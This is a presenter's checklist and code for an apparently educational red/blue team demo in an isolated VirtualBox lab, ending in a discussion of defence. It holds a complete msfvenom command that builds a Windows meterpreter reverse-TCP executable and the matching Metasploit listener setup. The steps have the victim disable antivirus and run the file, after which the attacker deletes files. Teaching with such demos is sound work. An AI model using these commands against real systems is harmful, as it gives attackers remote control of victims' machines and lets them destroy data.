Presentation Checklist

  1. SuperDemo Discussion (Phil, Dan)
  2. Development environment
  3. VirtualBox
  4. Network (internal)
  5. BLUE: Win10 VM (ipconfig, ping)
  6. BLUE: Create “Important New Document.txt”
  7. RED: Kali VM
  8. RED: Create EXPLOIT (paste)
  9. RED: Set up meterpreter (paste)
  10. Share in lieu of email
  11. RED: Drop EXPLOIT on the share
  12. BLUE: Turn OFF virus
  13. BLUE: Drag EXPLOIT to Desktop
  14. BLUE: Double-Click (execute) EXPLOIT
  15. RED: Meterpreter AWAKENS
  16. RED: dir, ps, sysinfo, ps | grep explorer
  17. RED: migrate [explorer ID]
  18. RED: Delete “Important New Document.txt”
  19. BLUE: “Important New Document.txt” GONE!
  20. RED: Delete “EXPLOIT.exe”
  21. BLUE: “EXPLOIT.exe” GONE!
  22. BLUE: NOTHING in Recycle Bin!
  23. RED: Quit LISTENER
  24. DISCUSSION - What is PURPLE to do…

Presentation Code

EXPLOIT

msfvenom \
-p windows/meterpreter/reverse_tcp \
LHOST=192.168.128.13 \
LPORT=4444 \
-f exe \
-o ~/Desktop/EXPLOIT.exe

LISTENER

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.128.13
set LPORT 4444
show options